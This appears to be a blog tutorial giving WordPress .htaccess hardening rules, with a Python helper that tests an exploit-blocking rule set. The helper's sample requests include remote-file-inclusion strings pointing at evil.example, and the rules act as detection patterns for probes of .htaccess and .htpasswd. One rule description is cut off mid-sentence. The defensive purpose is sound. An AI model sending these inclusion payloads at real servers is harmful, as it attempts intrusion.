Advanced mod_rewrite Examples From WordPress Plugins
Here are some specific .htaccess examples, taken mostly from the WordPress Password Protection plugin, which does a lot more than password protection, as the following mod_rewrite examples show. These are a few of the mod_rewrite uses that BlogSecurity said pushed the boundaries of mod_rewrite. Some of these snippets are quite exotic and unlike anything you may have seen before; they are only for those who understand them, because a mistake in one of them can take a website down very quickly. The mod_rewrite snippets below assume RewriteEngine On has already been set earlier in the same .htaccess file.
#1 - Directory Protection
Enable directory index protection: Options -Indexes stops Apache from listing a directory's contents when no index file is present, and DirectoryIndex sets which file is served by default.
    Options -Indexes
    DirectoryIndex index.html index.php /index.php
#2 - Password Protect wp-login.php
Requires a valid username/password (HTTP Basic auth checked against the .htpasswd file) to access the login page. The Order/Deny/Satisfy directives used here and in #3 are Apache 2.2 access-control syntax; Apache 2.4 only accepts them when mod_access_compat is loaded.
    <Files wp-login.php>
        Order Deny,Allow
        Deny from All
        Satisfy Any
        AuthName "Protected By YourDomain"
        AuthUserFile /web/YourDomain.com/.htpasswda1
        AuthType Basic
        Require valid-user
    </Files>
#3 - Password Protect wp-admin
Requires a valid username/password to access any non-static (CSS, JS, images) file in this directory. Static files and async-upload.php are exempted with Allow from All, which Satisfy Any accepts as an alternative to the password check.
    Options -ExecCGI -Indexes +FollowSymLinks -Includes
    DirectoryIndex index.php /index.php
    Order Deny,Allow
    Deny from All
    Satisfy Any
    AuthName "Protected By YourDomain"
    AuthUserFile /web/YourDomain.com/.htpasswda1
    AuthType Basic
    Require valid-user
    <FilesMatch "\.(ico|pdf|flv|jpg|jpeg|mp3|mpg|mp4|mov|wav|wmv|png|gif|swf|css|js)$">
        Allow from All
    </FilesMatch>
    <FilesMatch "(async-upload)\.php$">
        <IfModule mod_security.c>
            SecFilterEngine Off
        </IfModule>
        Allow from All
    </FilesMatch>
#4 - Protect wp-content
Denies any direct request for a file under wp-content ending in .php, .html, .htm or .txt with a 403 Forbidden (flexible-upload-wp25js.php is exempted). May break plugins/themes.
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /wp-content/.*$ [NC]
    RewriteCond %{REQUEST_FILENAME} !^.+flexible-upload-wp25js.php$
    RewriteCond %{REQUEST_FILENAME} ^.+\.(php|html|htm|txt)$
    RewriteRule .? - [F,NS,L]
#5 - Protect wp-includes
Denies any direct request for a .php file under wp-includes with a 403 Forbidden, except files under wp-includes/js/. May break plugins/themes.
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /wp-includes/.*$ [NC]
    RewriteCond %{THE_REQUEST} !^[A-Z]{3,9}\ /wp-includes/js/.+/.+\ HTTP/ [NC]
    RewriteCond %{REQUEST_FILENAME} ^.+\.php$
    RewriteRule .? - [F,NS,L]
#6 - Common Exploits
Block common exploit requests with a 403 Forbidden: triple-slash paths, a query string that starts with a URL, a double question mark, references to .asp/.ini/.dll, and requests for .htpasswd/.htaccess files. Requests under wp-login.php, wp-admin/, wp-content/plugins/ and wp-includes/ are exempt. These can help a lot, but may break some plugins.
    RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ ///.*\ HTTP/ [NC,OR]
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\=?(http|ftp|ssl|https):/.*\ HTTP/ [NC,OR]
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\?\?.*\ HTTP/ [NC,OR]
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(asp|ini|dll).*\ HTTP/ [NC,OR]
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*\.(htpasswd|htaccess|dehtpasswd).*\ HTTP/ [NC]
    RewriteRule .? - [F,NS,L]
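Rule set #6 replayed against constructed request lines, as an added example that is not part of the original post or the plugin: each RewriteCond is translated into a Python regex (THE_REQUEST is Apache's raw request line, REQUEST_URI its path without the query) so you can see which condition would block a request before deploying a change. The function and pattern names are my own.

```python
import re

# Hypothetical helper, not part of the plugin: replays rule set #6 against raw
# request lines. In Apache, THE_REQUEST is the request line as received
# ("GET /path?query HTTP/1.1") and REQUEST_URI is its path without the query.
# Every condition carries [NC], which maps to re.IGNORECASE here.

# First RewriteCond: paths that are never checked. It is ANDed with the [OR]
# chain below, so an exempt path passes regardless of the other patterns.
EXEMPT_URI = re.compile(r"^/(wp-login\.php|wp-admin/|wp-content/plugins/|wp-includes/)", re.I)

# The [OR] chain, in the page's order; the first pattern that matches wins.
EXPLOIT_PATTERNS = [
    ("triple-slash",         re.compile(r"^[A-Z]{3,9} ///.* HTTP/", re.I)),
    ("url-at-query-start",   re.compile(r"^[A-Z]{3,9} /.*\?=?(http|ftp|ssl|https):/.* HTTP/", re.I)),
    ("double-question-mark", re.compile(r"^[A-Z]{3,9} /.*\?\?.* HTTP/", re.I)),
    ("asp-ini-dll",          re.compile(r"^[A-Z]{3,9} /.*\.(asp|ini|dll).* HTTP/", re.I)),
    ("htaccess-htpasswd",    re.compile(r"^[A-Z]{3,9} /.*\.(htpasswd|htaccess|dehtpasswd).* HTTP/", re.I)),
]


def request_uri(request_line):
    """Path component of the request line, without the query string."""
    parts = request_line.split(" ")
    return parts[1].split("?", 1)[0] if len(parts) >= 2 else ""


def evaluate(request_line):
    """Return ('allow' | '403', reason) as rule set #6 would decide."""
    if EXEMPT_URI.match(request_uri(request_line)):
        return ("allow", "exempt prefix")
    for name, pattern in EXPLOIT_PATTERNS:
        if pattern.match(request_line):
            return ("403", name)
    return ("allow", "no pattern matched")


# Constructed request lines (not real traffic) covering each branch.
SAMPLE_REQUESTS = [
    "GET /index.php?http://evil.example/shell.txt HTTP/1.1",       # URL is the whole query
    "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1",  # URL after a key: the pattern is anchored at '?', so not caught
    "GET /wp-admin/admin.php?page=x.dll HTTP/1.1",                 # exempt path, .dll never checked
    "GET ///index.php HTTP/1.0",
    "get /config.ini HTTP/1.1",                                    # [NC]: lower-case method still matches
    "GET /.htaccess HTTP/1.1",
    "POST /wp-comments-post.php HTTP/1.1",
]


def audit(lines=SAMPLE_REQUESTS):
    """Map each request line to its verdict; useful when reviewing a rule change."""
    return {line: evaluate(line) for line in lines}


if __name__ == "__main__":
    for line, (verdict, reason) in audit().items():
        print(f"{verdict:5} {reason:22} {line}")
```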
#7 - Stop Hotlinking
Denies any request for static files (images, CSS, etc.) if the referrer is neither empty nor the local site; requests under wp-login.php, wp-admin/, wp-content/plugins/ and wp-includes/ are exempt.
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
    RewriteCond %{HTTP_REFERER} !^https://www.YourDomain.com.*$ [NC]
    RewriteRule \.(ico|pdf|flv|jpg|jpeg|mp3|mpg|mp4|mov|wav|wmv|png|gif|swf|css|js)$ - [F,NS,L]
#8 - Safe Request Methods
Denies any request not using
    RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|POST|PROPFIND|OPTIONS|PUT)$ [NC]
    RewriteRule .? - [F,NS,L]
#9 - Forbid Proxies
Denies any POST request that carries proxy headers (Via, Forwarded, X-Forwarded-For, Proxy-Connection and similar). Such clients can still browse the site, but cannot comment.
    RewriteCond %{REQUEST_METHOD} =POST
    RewriteCond %{HTTP:VIA}%{HTTP:FORWARDED}%{HTTP:USERAGENT_VIA}%{HTTP:X_FORWARDED_FOR}%{HTTP:PROXY_CONNECTION} !^$ [OR]
    RewriteCond %{HTTP:XPROXY_CONNECTION}%{HTTP:HTTP_PC_REMOTE_ADDR}%{HTTP:HTTP_CLIENT_IP} !^$
    RewriteCond %{REQUEST_URI} !^/(wp-login.php|wp-admin/|wp-content/plugins/|wp-includes/).* [NC]
    RewriteRule .? - [F,NS,L]
#10 - Real wp-comments-post.php
Denies any POST attempt made to a non-existing wp-comments-post.php. The pattern only matches the file inside a subdirectory, so the real /wp-comments-post.php at the site root is unaffected; note that the condition as written does not check the request method, so it blocks GET requests to such a path too.
    RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /.*/wp-comments-post\.php.*\ HTTP/ [NC]
    RewriteRule .? - [F,NS,L]
We will cover more in the next part. Keep in touch, and please share your feedback, suggestions or views in the comment section below.